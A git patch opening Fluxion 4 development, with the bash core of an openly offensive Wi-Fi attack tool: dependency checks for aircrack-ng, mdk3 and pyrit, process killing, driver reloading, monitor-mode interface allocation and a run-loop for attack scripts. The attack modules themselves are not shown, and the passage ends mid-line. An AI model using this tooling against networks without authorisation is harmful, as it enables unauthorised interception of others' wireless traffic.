From 0dd1e084c8dae42d1ca53b52428d58b88498b3f0 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Fri, 5 Jan 2018 18:32:57 -0600 Subject: [PATCH 01/45] Started fluxion 4 development. This version will focus on providing robust services for the attack scripts. Development and migration will happen in the new "fluxion" script file. The following are currently being implemented, or have been implemented: * Core fluxion globals, including paths and workspace. * Core sanity checks, including xterm and super user checks. * Core library includes & library scripts' configuration. * Command line interface parameter parsing & loading. * User preferences importing, loading, & handling. * Configurables (prefererences & CLI flags) are properly handled. * Fluxion startup and shutdown behaviour refactored. * Handler subroutines are loaded & configured properly. * A small sequencing framework, to refactor some run-loops. * A small universal interface-allocation & retrival framework. * A couple of fluxion used helper subroutines. * A candidate fluxion run-loop. --- fluxion | 857 ++++++++++++++++++++++++++++++++++++++++++ language/en.sh | 14 +- lib/InterfaceUtils.sh | 39 +- 3 files changed, 896 insertions(+), 14 deletions(-) create mode 100755 fluxion diff --git a/fluxion b/fluxion new file mode 100755 index 0000000..cd71421 --- /dev/null +++ b/fluxion @@ -0,0 +1,857 @@ +#!/bin/bash + +# ============================================================ # +# ================== < FLUXION Parameters > ================== # +# ============================================================ # +# Warning: The FLUXIONPath constant will be incorrectly set when +# called directly via a system link. System links in the path to +# the script, however, will be loaded correctly. + +# Path to directory containing the FLUXION executable script. +declare -r FLUXIONPath=$(cd "$(dirname "$0")"; pwd -P) + +# Path to the temp. directory available to FLUXION & subscripts. +declare -r FLUXIONWorkspacePath="/tmp/fluxspace" + +# Path to FLUXION's preferences file, to be loaded afterward. +declare -r FLUXIONPreferencesFile="$FLUXIONPath/preferences.sh" + +# Constants denoting the reference noise floor & ceiling levels. +# These are used by the the wireless network scanner visualizer. +declare -r FLUXIONNoiseFloor=-90 +declare -r FLUXIONNoiseCeiling=-60 + +declare -r FLUXIONVersion=4 +declare -r FLUXIONRevision=0 + + +# ============================================================ # +# ================= < Script Sanity Checks > ================= # +# ============================================================ # +if [ $EUID -ne 0 ] # Super User Check + then echo -e "Aborted, please execute the script as root."; exit 1 +fi + +# ===================== < XTerm Checks > ===================== # +if [ ! "${DISPLAY:-}" ] # Assure display is available. + then echo -e "Aborted, X (graphical) session unavailable."; exit 2 +fi + +if ! hash xdpyinfo 2>/dev/null # Assure display probe possible. + then echo -e "Aborted, xdpyinfo is unavailable."; exit 3 +fi + +if ! xdpyinfo &>/dev/null # Assure display info is available. + then echo -e "Aborted, xterm test session failed."; exit 3 +fi + +# ================ < Parameter Parser Check > ================ # +getopt --test > /dev/null # Assure enhanced getopt (returns 4). +if [ $? -ne 4 ] + then echo "Aborted, enhanced getopt isn't available."; exit 4 +fi + +# =============== < Working Directory Check > ================ # +if ! mkdir -p "$FLUXIONWorkspacePath" &> /dev/null + then echo "Aborted, can't generate a workspace directory."; exit 5 +fi + +# Once sanity check is passed, we can start to load everything. + + +# ============================================================ # +# =================== < Library Includes > =================== # +# ============================================================ # +source lib/installer/InstallerUtils.sh +source lib/InterfaceUtils.sh +source lib/SandboxUtils.sh +source lib/FormatUtils.sh +source lib/ColorUtils.sh +source lib/IOUtils.sh +source lib/HashUtils.sh + +# NOTE: These are configured after arguments are loaded (later). + + +# ============================================================ # +# =================== < Parse Parameters > =================== # +# ============================================================ # +if ! FLUXIONCLIArguments=$(getopt --options="vdkrntl:a:" --longoptions="debug,version,killer,reloader,airmon-ng,target,language:,attack:" --name="FLUXION V$FLUXIONVersion.$FLUXIONRevision" -- "$@") + then echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 5 +fi + +declare -r FLUXIONCLIArguments=$FLUXIONCLIArguments + + +# ============================================================ # +# ================== < Load Configurables > ================== # +# ============================================================ # + +# ============= < Argument Loaded Configurables > ============ # +eval set -- "$FLUXIONCLIArguments" # Set environment parameters. + +[ "$1" ] && declare -r FLUXIONAuto=1 # Auto-mode if using CLI. + +while [ "$1" != "--" ]; do + case "$1" in + -v|--version) echo "FLUXION V$FLUXIONVersion.$FLUXIONRevision"; exit;; + -d|--debug) declare -r FLUXIONDebug=1;; + -k|--killer) declare -r FLUXIONWIKillProcesses=1;; + -r|--reloader) declare -r FLUXIONWIReloadDriver=1;; + -n|--airmon-ng) declare -r FLUXIONAirmonNG=1;; + -l|--language) FLUXIONLanguage=$2; shift;; + -a|--attack) FLUXIONAttack=$2; shift;; + esac + shift # Shift new parameters +done + +shift # Remove "--" to prepare for attacks to read parameters. +# Executable arguments are handled after subroutine definition. + +# =================== < User Preferences > =================== # +# Load user-defined preferences if there's an executable script. +# WARNING: Preferences file must assure no redeclared constants. +if [ -x "$FLUXIONPreferencesFile" ] + then source "$FLUXIONPreferencesFile" +fi + +# ================ < Configurable Constants > ================ # +if [ "$FLUXIONAuto" != "1" ] # If defined, assure 1. + then declare -r FLUXIONAuto=${FLUXIONAuto:+1} +fi + +if [ "$FLUXIONDebug" != "1" ] # If defined, assure 1. + then declare -r FLUXIONDebug=${FLUXIONDebug:+1} +fi + +if [ "$FLUXIONAirmonNG" != "1" ] # If defined, assure 1. + then declare -r FLUXIONAirmonNG=${FLUXIONAirmonNG:+1} +fi + +if [ "$FLUXIONWIKillProcesses" != "1" ] # If defined, assure 1. + then declare -r FLUXIONWIKillProcesses=${FLUXIONWIKillProcesses:+1} +fi + +if [ "$FLUXIONWIReloadDriver" != "1" ] # If defined, assure 1. + then declare -r FLUXIONWIReloadDriver=${FLUXIONWIReloadDriver:+1} +fi + +# FLUXIONDebug [Normal Mode "" / Developer Mode 1] +if [ $FLUXIONDebug ]; then + declare -r FLUXIONOutputDevice="/dev/stdout" + declare -r FLUXIONHoldXterm="-hold" +else + declare -r FLUXIONOutputDevice="/dev/null" + declare -r FLUXIONHoldXterm="" +fi + +# ================ < Configurable Variables > ================ # +declare -r FLUXIONPromptDefault="$CRed[${CSBlu}fluxion$CSYel@$CSWht$HOSTNAME$CClr$CRed]-[$CSYel~$CClr$CRed]$CClr " +FLUXIONPrompt=$FLUXIONPromptDefault + +declare -r FLUXIONVLineDefault="$CRed[$CSYel*$CClr$CRed]$CClr" +FLUXIONVLine=$FLUXIONVLineDefault + +# ================== < Library Parameters > ================== # +declare -r InterfaceUtilsOutputDevice="$FLUXIONOutputDevice" + +declare -r SandboxWorkspacePath="$FLUXIONWorkspacePath" +declare -r SandboxOutputDevice="$FLUXIONOutputDevice" + +declare -r InstallerUtilsWorkspacePath="$FLUXIONWorkspacePath" +declare -r InstallerUtilsOutputDevice="$FLUXIONOutputDevice" +declare -r InstallerUtilsNoticeMark="$FLUXIONVLine" + +declare -r PackageManagerLog="$InstallerUtilsWorkspacePath/package_manager.log" + +declare -r IOUtilsHeader="fluxion_header" +declare -r IOUtilsQueryMark="$FLUXIONVLine" +declare -r IOUtilsPrompt="$FLUXIONPrompt" + +declare -r HashOutputDevice="$FLUXIONOutputDevice" + + +# ============================================================ # +# =================== < Default Language > =================== # +# ============================================================ # +# Set by default in case fluxion is aborted before setting one. +source "$FLUXIONPath/language/en.sh" + + +# ============================================================ # +# ================== < Startup & Shutdown > ================== # +# ============================================================ # +function fluxion_startup() { + if [ "$FLUXIONDebug" ]; then return 1; fi + + FLUXIONBanner=() + + format_center_literals " ⌠▓▒▓▒ ⌠▓╗ ⌠█┐ ┌█ ┌▓\ /▓┐ ⌠▓╖ ⌠◙▒▓▒◙ ⌠█\ ☒┐" + FLUXIONBanner+=("$FormatCenterLiterals") + format_center_literals " ║▒_ │▒║ │▒║ ║▒ \▒\/▒/ │☢╫ │▒┌╤┐▒ ║▓▒\ ▓║" + FLUXIONBanner+=("$FormatCenterLiterals") + format_center_literals " ≡◙◙ ║◙║ ║◙║ ║◙ ◙◙ ║¤▒ ║▓║☯║▓ ♜◙\✪\◙♜" + FLUXIONBanner+=("$FormatCenterLiterals") + format_center_literals " ║▒ │▒║__ │▒└_┘▒ /▒/\▒\ │☢╫ │▒└╧┘▒ ║█ \▒█║" + FLUXIONBanner+=("$FormatCenterLiterals") + format_center_literals " ⌡▓ ⌡◘▒▓▒ ⌡◘▒▓▒◘ └▓/ \▓┘ ⌡▓╝ ⌡◙▒▓▒◙ ⌡▓ \▓┘" + FLUXIONBanner+=("$FormatCenterLiterals") + format_center_literals "¯¯¯ ¯¯¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯ ¯¯¯ ¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯" + FLUXIONBanner+=("$FormatCenterLiterals") + + clear + + if [ "$FLUXIONAuto" ] + then echo -e "$CBlu" + else echo -e "$CRed" + fi + + for line in "${FLUXIONBanner[@]}" + do echo "$line"; sleep 0.05 + done + + echo # Do not remove. + + sleep 0.1 + format_center_literals "${CGrn}Site: ${CRed}https://github.com/FluxionNetwork/fluxion$CClr" + echo -e "$FormatCenterLiterals" + + sleep 0.1 + format_center_literals "${CSRed}FLUXION $FLUXIONVersion$CClr (rev. $CSBlu$FLUXIONRevision$CClr)$CYel by$CWht ghost" + echo -e "$FormatCenterLiterals" + + sleep 0.1 + if installer_utils_check_update "https://raw.githubusercontent.com/FluxionNetwork/fluxion/master/fluxion.sh" "FLUXIONVersion=" "FLUXIONRevision=" $FLUXIONVersion $FLUXIONRevision + then installer_utils_run_update "https://github.com/FluxionNetwork/fluxion/archive/master.zip" "FLUXION-V$FLUXIONVersion.$FLUXIONRevision" "$(dirname "$FLUXIONPath")" + fi + + echo # Do not remove. + + FLUXIONCLIToolsRequired=("aircrack-ng" "python2:python2.7|python2" "bc" "awk:awk|gawk|mawk" "curl" "dhcpd:isc-dhcp-server|dhcp" "7zr:p7zip" "hostapd" "lighttpd" "iwconfig:wireless-tools" "macchanger" "mdk3" "nmap" "openssl" "php-cgi" "pyrit" "xterm" "rfkill" "unzip" "route:net-tools" "fuser:psmisc" "killall:psmisc") + FLUXIONCLIToolsMissing=() + + while ! installer_utils_check_dependencies FLUXIONCLIToolsRequired[@] + do installer_utils_run_dependencies InstallerUtilsCheckDependencies[@] + done + + echo -e "\n\n" # This echo is for spacing +} + +function fluxion_shutdown() { + if [ $FLUXIONDebug ]; then return 1; fi + + # Show the header if the subroutine has already been loaded. + if type -t fluxion_header &> /dev/null + then fluxion_header + fi + + echo -e "$CWht[$CRed-$CWht]$CRed $FLUXIONCleanupAndClosingNotice$CClr" + + # List currently running processes which we might have to kill before exiting. + local processes + readarray processes < <(ps -A) + + # Currently, fluxion is only responsible for killing airodump-ng, since + # fluxion explicitly uses it to scan for candidate target access points. + # NOTICE: Processes started by subscripts, such as an attack script, + # MUST BE TERMINATED BY THAT SAME SCRIPT in the subscript's abort handler. + local -r targets=("airodump-ng") + + local targetID # Program identifier/title + for targetID in "${targets[@]}"; do + # Get PIDs of all programs matching targetPID + local targetPID=$(echo "${processes[@]}" | awk '$4~/'"$targetID"'/{print $1}') + if [ ! "$targetPID" ]; then continue; fi + echo -e "$CWht[$CRed-$CWht] `io_dynamic_output $FLUXIONKillingProcessNotice`" + kill -s SIGKILL $targetPID &> $FLUXIONOutputDevice + done + + # Assure changes are reverted if installer was activated. + if [ "$PackageManagerCLT" ]; then + echo -e "$CWht[$CRed-$CWht] "$(io_dynamic_output "$FLUXIONRestoringPackageManagerNotice")"$CClr" + unprep_package_manager + fi + + # If allocated interfaces exist, deallocate them now. + if [ ${#FluxionInterfaces[@]} -gt 0 ]; then + echo -e "$FLUXIONVLine $FLUXIONRemovingExtraWINotice" + + local interface + for interface in "${!FluxionInterfaces[@]}"; do + # Only deallocate fluxion or airmon-ng created interfaces. + if [[ "$interface" == "flux"* || "$interface" == *"mon"* ]]; then + echo -e "$CWht[$CRed-$CWht] $FLUXIONDisablingMonitorNotice$CGrn $interface$CClr" + fluxion_deallocate_interface $interface + fi + done + fi + + echo -e "$CWht[$CRed-$CWht] $FLUXIONRestoringTputNotice$CClr" + tput cnorm + + if [ ! $FLUXIONDebug ]; then + echo -e "$CWht[$CRed-$CWht] $FLUXIONDeletingFilesNotice$CClr" + sandbox_remove_workfile "$FLUXIONWorkspacePath/*" + fi + + if [ $FLUXIONWIKillProcesses ]; then + echo -e "$CWht[$CRed-$CWht] $FLUXIONRestartingNetworkManagerNotice$CClr" + + # TODO: Add support for other network managers (wpa_supplicant?). + if [ $(which systemctl) ]; then + service network-manager restart &> $FLUXIONOutputDevice & + service networkmanager restart &> $FLUXIONOutputDevice & + service networking restart &> $FLUXIONOutputDevice & + else + systemctl restart network-manager.service &> $FLUXIONOutputDevice & + fi + fi + + echo -e "$CWht[$CGrn+$CWht] $CGrn$FLUXIONCleanupSuccessNotice$CClr" + echo -e "$CWht[$CGrn+$CWht] $CGry$FLUXIONThanksSupportersNotice$CClr" + + sleep 3 + + clear + + exit 0 +} + + +# ============================================================ # +# ================= < Handler Subroutines > ================== # +# ============================================================ # +# Delete log only in Normal Mode ! +function fluxion_conditional_clear() { + # Clear iff we're not in debug mode + if [ ! $FLUXIONDebug ]; then clear; fi +} + +function fluxion_conditional_bail() { + echo ${1:-"Something went wrong, whoops! (report this)"} + sleep 5 + if [ ! $FLUXIONDebug ]; then + fluxion_handle_exit + return 1 + fi + echo "Press any key to continue execution..." + read bullshit +} + +# ERROR Report only in Developer Mode +if [ $FLUXIONDebug ] + function fluxion_error_report() { + echo "Exception caught @ line #$1" + } + + then trap 'fluxion_error_report $LINENO' ERR +fi + +function fluxion_handle_abort_attack() { + if [ $(type -t stop_attack) ]; then + stop_attack &> $FLUXIONOutputDevice + unprep_attack &> $FLUXIONOutputDevice + else + echo "Attack undefined, can't stop anything..." > $FLUXIONOutputDevice + fi +} + +# In case of abort signal, abort any attacks currently running. +trap fluxion_handle_abort_attack SIGABRT + +function fluxion_handle_exit() { + fluxion_handle_abort_attack + fluxion_shutdown + exit 1 +} + +# In case of unexpected termination, run fluxion_shutdown. +trap fluxion_handle_exit SIGINT SIGHUP + + +# ============================================================ # +# =============== < Resolution & Positioning > =============== # +# ============================================================ # +function fluxion_set_resolution() { # Windows + Resolution + # Calc options + RATIO=4 + + # Get demensions + SCREEN_SIZE=$(xdpyinfo | grep dimension | awk '{print $4}' | tr -d "(") + SCREEN_SIZE_X=$(printf '%.*f\n' 0 $(echo $SCREEN_SIZE | sed -e s'/x/ /'g | awk '{print $1}')) + SCREEN_SIZE_Y=$(printf '%.*f\n' 0 $(echo $SCREEN_SIZE | sed -e s'/x/ /'g | awk '{print $2}')) + + PROPOTION=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$SCREEN_SIZE_Y}")/1 | bc) + NEW_SCREEN_SIZE_X=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$RATIO}")/1 | bc) + NEW_SCREEN_SIZE_Y=$(echo $(awk "BEGIN {print $SCREEN_SIZE_Y/$RATIO}")/1 | bc) + + NEW_SCREEN_SIZE_BIG_X=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_X/$RATIO}")/1 | bc) + NEW_SCREEN_SIZE_BIG_Y=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_Y/$RATIO}")/1 | bc) + + SCREEN_SIZE_MID_X=$(echo $(($SCREEN_SIZE_X + ($SCREEN_SIZE_X - 2 * $NEW_SCREEN_SIZE_X) / 2))) + SCREEN_SIZE_MID_Y=$(echo $(($SCREEN_SIZE_Y + ($SCREEN_SIZE_Y - 2 * $NEW_SCREEN_SIZE_Y) / 2))) + + # Upper + TOPLEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0+0" + TOPRIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0+0" + TOP="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+$SCREEN_SIZE_MID_X+0" + + # Lower + BOTTOMLEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0-0" + BOTTOMRIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0-0" + BOTTOM="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+$SCREEN_SIZE_MID_X-0" + + # Y mid + LEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0-$SCREEN_SIZE_MID_Y" + RIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0+$SCREEN_SIZE_MID_Y" + + # Big + TOPLEFTBIG="-geometry $NEW_SCREEN_SIZE_BIG_Xx$NEW_SCREEN_SIZE_BIG_Y+0+0" + TOPRIGHTBIG="-geometry $NEW_SCREEN_SIZE_BIG_Xx$NEW_SCREEN_SIZE_BIG_Y-0+0" +} + + +# ============================================================ # +# ================= < Sequencing Framework > ================= # +# ============================================================ # +# The following lists some problems with the framework's design. +# The list below is a list of DESIGN FLAWS, not framework bugs. +# * Sequenced undo instructions' return value is being ignored. +# * A global is generated for every new namespace being used. +# * It uses eval too much, but it's bash, so that's not so bad. +# TODO: Try to fix this or come up with a better alternative. +declare -rA FLUXIONUndoable=( \ + ["set"]="unset" \ + ["prep"]="unprep" \ + ["run"]="halt" \ + ["start"]="stop" \ +) + +function fluxion_do() { + if [ ${#@} -lt 2 ]; then return -1; fi + + local -r namespace=$1 + local -r identifier=$2 + + eval FXDLog_$namespace+=\("$identifier"\) + eval ${namespace}_$identifier "${@:3}" + return $? +} + +function fluxion_undo() { + if [ ${#@} -ne 1 ]; then return -1; fi + + local -r namespace=$1 + + eval local -r history=\("\${FXDLog_$namespace[@]}"\) + + local i + for (( i=${#history[@]}; i > 0; i-- )); do + local -r instruction=${history[i-1]} + local -r command=${instruction%%_*} + local -r identifier=${instruction#*_} + if eval ${namespace}_${FLUXIONUndoable["$command"]}_$identifier; then + eval FXDLog_$namespace=\("${history[@]::$i}"\) + return 0 + fi + done + + return -2 # The undo-chain failed. +} + +function fluxion_done() { + eval "FluxionDone=\${FXDLog_$namespace[-1]}" + [ ! $FluxionDone ] && return 1 +} + +function fluxion_done_reset() { + if [ ${#@} -ne 1 ]; then return -1; fi + local -r namespace=$1 + eval FXDLog_$namespace=\(\) +} + +function fluxion_do_sequence() { + if [ ${#@} -ne 2 ]; then return -1; fi + + # TODO: Implement an alternative, better method of doing + # what this subroutine does, maybe using for-loop iteration. + # The for-loop implementation must support the subroutines + # defined above, including updating the namespace tracker. + + local -r namespace=$1 + local -r sequence=("${!2}") + + if [ ${#sequence[@]} -eq 0 ]; then return -2; fi + + local -A index=() + + local i + for i in $(seq ${#sequence[@]}); do + index["${sequence[i-1]}"]=$i + done + + local instruction=${sequence[0]} + while [ "$instruction" ]; do + if ! fluxion_do $namespace $instruction; then + if ! fluxion_undo $namespace + then break + fi + fi + + if ! fluxion_done; then return -3; fi + + local instructionIndex=${index["$FluxionDone"]} + + if [ ! "$instructionIndex" ]; then return -4; fi + + instruction=${sequence["$instructionIndex"]} + done +} + + +# ============================================================ # +# ================= < Load All Subroutines > ================= # +# ============================================================ # +function fluxion_header() { + format_apply_autosize "[%*s]\n" + local verticalBorder=$FormatApplyAutosize + + format_apply_autosize "[%*s${CSRed}FLUXION $FLUXIONVersion${CSWht}.${CSBlu}$FLUXIONRevision$CSRed <$CIRed F${CIYel}luxion$CIRed I${CIYel}s$CIRed T${CIYel}he$CIRed F${CIYel}uture$CClr$CSYel >%*s$CSBlu]\n" + local headerTextFormat="$FormatApplyAutosize" + + fluxion_conditional_clear + + echo -e "$(printf "$CSRed$verticalBorder" "" | sed -r "s/ /~/g")" + printf "$CSRed$verticalBorder" "" + printf "$headerTextFormat" "" "" + printf "$CSBlu$verticalBorder" "" + echo -e "$(printf "$CSBlu$verticalBorder" "" | sed -r "s/ /~/g")$CClr" + echo + echo +} + +# ======================= < Language > ======================= # +function fluxion_unset_language() { + FLUXIONLanguage="" +} + +function fluxion_set_language() { + if [ ! "$FLUXIONLanguage" ]; then + if [ "$FLUXIONAuto" ]; then + FLUXIONLanguage="en" + else + # Get all languages available. + local languageCodes + readarray -t languageCodes < <(ls -1 language | sed -E 's/\.sh//') + + local languages + readarray -t languages < <(head -n 3 language/*.sh | grep -E "^# native: " | sed -E 's/# \w+: //') + + io_query_format_fields "$FLUXIONVLine Select your language" "\t$CRed[$CSYel%d$CClr$CRed]$CClr %s / %s\n" languageCodes[@] languages[@] + + FLUXIONLanguage=${IOQueryFormatFields[0]} + + echo # Do not remove. + fi + fi + + # Check if all language files are present for the selected language. + find -type d -name language | while read language_dir; do + if [ ! -e "$language_dir/${FLUXIONLanguage}.sh" ]; then + echo -e "$FLUXIONVLine ${CYel}Warning${CClr}, missing language file:" + echo -e "\t$language_dir/${FLUXIONLanguage}.sh" + return 1 + fi + done + + if [ $? -eq 1 ]; then # If a file is missing, fall back to english. + echo -e "\n\n$FLUXIONVLine Falling back to English..."; sleep 5 + FLUXIONLanguage="en" + fi + + source "$FLUXIONPath/language/$FLUXIONLanguage.sh" +} + +# ====================== < Interfaces > ====================== # +declare -A FluxionInterfaces=() # Global interfaces' registry. + +function fluxion_deallocate_interface() { # Release interfaces + if [ ! "$1" ] || ! interface_is_real $1; then return 1; fi + + local -r oldIdentifier=$1 + local -r newIdentifier=${FluxionInterfaces[$oldIdentifier]} + + # Assure the interface is in the allocation table. + if [ ! "$newIdentifier" ]; then return 2; fi + + if interface_is_wireless $oldInterface; then + # Unblock interfaces to make them available. + echo -e "$FLUXIONVLine $FLUXIONUnblockingWINotice" + rfkill unblock all &> $FLUXIONOutputDevice + + # Attempt deactivating monitor mode on the interface. + if interface_set_mode $oldIdentifier managed + then return 3 + fi + fi + + # If interface was allocated by airmon-ng, deallocate with it. + if [[ "$oldIdentifier" == *"mon"* ]]; then + if ! airmon-ng stop $oldIdentifier &> $FLUXIONOutputDevice + then return 4 + fi + else + # Attempt to restore the original interface identifier. + if ! interface_reidentify $oldIdentifier $newIdentifier + then return 5 + fi + fi + + # Once successfully renamed, remove from allocation table. + unset FluxionInterfaces[$oldIdentifier] + unset FluxionInterfaces[$newIdentifier] +} + +function fluxion_allocate_interface() { # Reserve interfaces + if [ ! "$1" ] || ! interface_is_real $1; then return 1; fi + + local -r identifier=$1 + + # If the interface is already in allocation table, return it. + if [ "${FluxionInterfaces[$identifier]+x}" ]; then + FluxionInterface=${FluxionInterfaces[$identifier]} + return 0 + fi + + echo -e "$FLUXIONVLine $FLUXIONAllocatingInterfaceNotice" + + if interface_is_wireless $identifier; then + # Unblock wireless interfaces to make them available. + echo -e "$FLUXIONVLine $FLUXIONUnblockingWINotice" + rfkill unblock all &> $FLUXIONOutputDevice + + if [ "$FLUXIONWIReloadDriver" ]; then + # Get selected interface's driver details/info-descriptor. + echo -e "$FLUXIONVLine $FLUXIONGatheringWIInfoNotice" + + if ! interface_driver "$identifier"; then + echo -e "$FLUXIONVLine$CRed $FLUXIONUnknownWIDriverError" + sleep 3 + return 2 + fi + + # Notice: This local is function-scoped, not block-scoped. + local -r driver="$InterfaceDriver" + + # Unload the driver module from the kernel. + rmmod -f $driver &> $FLUXIONOutputDevice + + # Wait while interface becomes unavailable. + echo -e "$FLUXIONVLine `io_dynamic_output $FLUXIONUnloadingWIDriverNotice`" + while interface_physical "$identifier" + do sleep 1 + done + fi + + if [ "$FLUXIONWIKillProcesses" ]; then + # Get list of potentially troublesome programs. + echo -e "$FLUXIONVLine $FLUXIONFindingConflictingProcessesNotice" + + # Kill potentially troublesome programs. + echo -e "$FLUXIONVLine $FLUXIONKillingConflictingProcessesNotice" + + # TODO: Make the loop below airmon-ng independent. + # Maybe replace it with a list of network-managers? + # WARNING: Version differences could break code below. + for program in "`airmon-ng check | awk 'NR>6{print $2}'`" + do killall "$program" &> $FLUXIONOutputDevice + done + fi + + if [ "$FLUXIONWIReloadDriver" ]; then + # Reload the driver module into the kernel. + modprobe "$driver" &> $FLUXIONOutputDevice + + # Wait while interface becomes available. + echo -e "$FLUXIONVLine `io_dynamic_output $FLUXIONLoadingWIDriverNotice`" + while ! interface_physical "$identifier" + do sleep 1 + done + fi + + # Set wireless flag to prevent having to re-query. + local -r allocatingWirelessInterface=1 + fi + + # If we're using the interface library, reidentify now. + # If usuing airmon-ng, let airmon-ng rename the interface. + if [ ! $FLUXIONAirmonNG ]; then + echo -e "$FLUXIONVLine $FLUXIONReidentifyingInterface" + + if [ $allocatingWirelessInterface ] + # Prevent interface-snatching by renaming the interface. + then interface_reidentify $identifier fluxwl${#FluxionInterfaces[@]} + else interface_reidentify $identifier fluxet${#FluxionInterfaces[@]} + fi + + if [ $? -ne 0 ] # If reidentifying failed, abort immediately. + then return 3 + fi + fi + + if [ $allocatingWirelessInterface ]; then + # Activate wireless interface monitor mode and save identifier. + echo -e "$FLUXIONVLine $FLUXIONStartingWIMonitorNotice" + + # TODO: Consider the airmon-ng flag is set, monitor mode is + # already enabled on the interface being allocated, and the + # interface identifier is something non-airmon-ng standard. + # The interface could already be in use by something else. + # Snatching or crashing interface issues could occur. + + # NOTICE: Conditionals below populate newIdentifier on success. + if [ $FLUXIONAirmonNG ]; then + local -r newIdentifier=$(airmon-ng start $identifier | grep "monitor .* enabled" | grep -oP "wl.*mon|mon[0-9]+") + else + # Attempt activating monitor mode on the interface. + if interface_set_mode fluxwl${#FluxionInterfaces[@]} monitor + # Register the new identifier upon consecutive successes. + then local -r newIdentifier=fluxwl${#FluxionInterfaces[@]} + # If monitor-mode switch fails, undo rename and abort. + else interface_reidentify fluxwl${#FluxionInterfaces[@]} $identifier + fi + fi + fi + + # On failure to allocate the interface, we've got to abort. + # Notice: If the interface was already in monitor mode and + # airmon-ng is activated, WE didn't allocate the interface. + if [ ! "$newIdentifier" -o "$newIdentifier" = "$oldIdentifier" ]; then + echo -e "$FLUXIONVLine $FLUXIONInterfaceAllocationFailedError" + sleep 3 + return 4 + fi + + # Register identifiers to allocation hash table. + FluxionInterfaces[$newIdentifier]=$identifier + FluxionInterfaces[$identifier]=$newIdentifier + + echo -e "$FLUXIONVLine $FLUXIONInterfaceAllocatedNotice" + sleep 3 + + # Notice: Interfaces are accessed with their original identifier + # as the key for the global FluxionInterfaces hash/map/dictionary. +} + +function fluxion_get_interface() { + if [[ "$1" != *"[@]" ]]; then return 1; fi + + local interfacesAvailable=("${!1}") + local interfacesAvailableInfo=() + local interfacesAvailableColor=() + local interfacesAvailableState=() + + # Gather information from all available interfaces. + local interfaceCandidate + for interfaceCandidate in "${interfacesAvailable[@]}"; do + interface_chipset "$interfaceCandidate" + interfacesAvailableInfo+=("$InterfaceChipset") + + # If it has already been allocated, we can use it at will. + if [ ${FluxionInterfaces["$interfaceCandidate"]} ]; then + interfacesAvailableColor+=("$CGrn") + interfacesAvailableState+=("[*]") + else + interface_state "$interfaceCandidate" + + if [ "$InterfaceState" = "up" ]; then + interfacesAvailableColor+=("$CPrp") + interfacesAvailableState+=("[-]") + else + interfacesAvailableColor+=("$CClr") + interfacesAvailableState+=("[+]") + fi + fi + done + + # If only one interface exists and it's not unavailable, choose it. + if [ "${#interfacesAvailable[@]}" -eq 1 -a \ + "${interfacesAvailableState[0]}" != "[-]" ]; then + FluxionGetInterfaceSelected="${interfacesAvailable[0]}" + FluxionGetInterfaceSelectedState="${interfacesAvailableState[0]}" + FluxionGetInterfaceSelectedInfo="${interfacesAvailableInfo[0]}" + else + interfacesAvailable+=( \ + "$FLUXIONGeneralRepeatOption" \ + "$FLUXIONGeneralBackOption" \ + ) + + interfacesAvailableColor+=( \ + "$CClr" \ + "$CClr" \ + ) + + format_apply_autosize "$CRed[$CSYel%1d$CClr$CRed]%b %-8b %3s$CClr %-*.*s\n" + io_query_format_fields \ + "$FLUXIONVLine $FLUXIONInterfaceQuery" "$FormatApplyAutosize" \ + interfacesAvailableColor[@] interfacesAvailable[@] \ + interfacesAvailableState[@] interfacesAvailableInfo[@] + + echo + + case "${IOQueryFormatFields[1]}" in + "$FLUXIONGeneralRepeatOption") return -2;; + "$FLUXIONGeneralBackOption") return -1;; + esac + + FluxionGetInterfaceSelected="${IOQueryFormatFields[1]}" + FluxionGetInterfaceSelectedState="${IOQueryFormatFields[2]}" + FluxionGetInterfaceSelectedInfo="${IOQueryFormatFields[3]}" + fi +} + + + + + + + + + + +# ============================================================ # +# ================= < Argument Executables > ================= # +# ============================================================ # +eval set -- "$FLUXIONCLIArguments" # Set environment parameters. + +while [ "$1" != "--" ]; do + case "$1" in + -t|--target) echo "Not yet implemented!"; sleep 3; fluxion_shutdown;; + esac + shift # Shift new parameters +done + +shift # Remove "--" to prepare for attacks to read parameters. + + +# ============================================================ # +# ===================== < FLUXION Loop > ===================== # +# ============================================================ # +function fluxion_main() { + fluxion_startup + + fluxion_set_resolution + fluxion_set_language + + local -r sequence=("set_attack" "prep_attack" "run_attack") + + while true # Fluxion's runtime-loop. + do fluxion_do_sequence fluxion sequence[@] + done + + fluxion_shutdown +} + +fluxion_main # Start Fluxion + +# FLUXSCRIPT END diff --git a/language/en.sh b/language/en.sh index 6f9ea4a..aa64840 100755 --- a/language/en.sh +++ b/language/en.sh @@ -3,22 +3,24 @@ # native: English FLUXIONInterfaceQuery="Select a wireless interface" +FLUXIONAllocatingInterfaceNotice="Starting interface reservation..." +FLUXIONReidentifyingInterface="Renaming interface..." FLUXIONUnblockingWINotice="Unblocking all wireless interfaces..." -FLUXIONFindingExtraWINotice="Looking for extraneous wireless interfaces..." +#FLUXIONFindingExtraWINotice="Looking for extraneous wireless interfaces..." FLUXIONRemovingExtraWINotice="Removing extraneous wireless interfaces..." FLUXIONFindingWINotice="Looking for available wireless interfaces..." FLUXIONSelectedBusyWIError="The wireless interface selected appears to be currently in use!" -FLUXIONSelectedBusyWITip="Run \"export FLUXIONWIKillProcesses=1\" before FLUXION to use it." +FLUXIONSelectedBusyWITip="This is usually caused by the network manager using the interface selected. We recommened 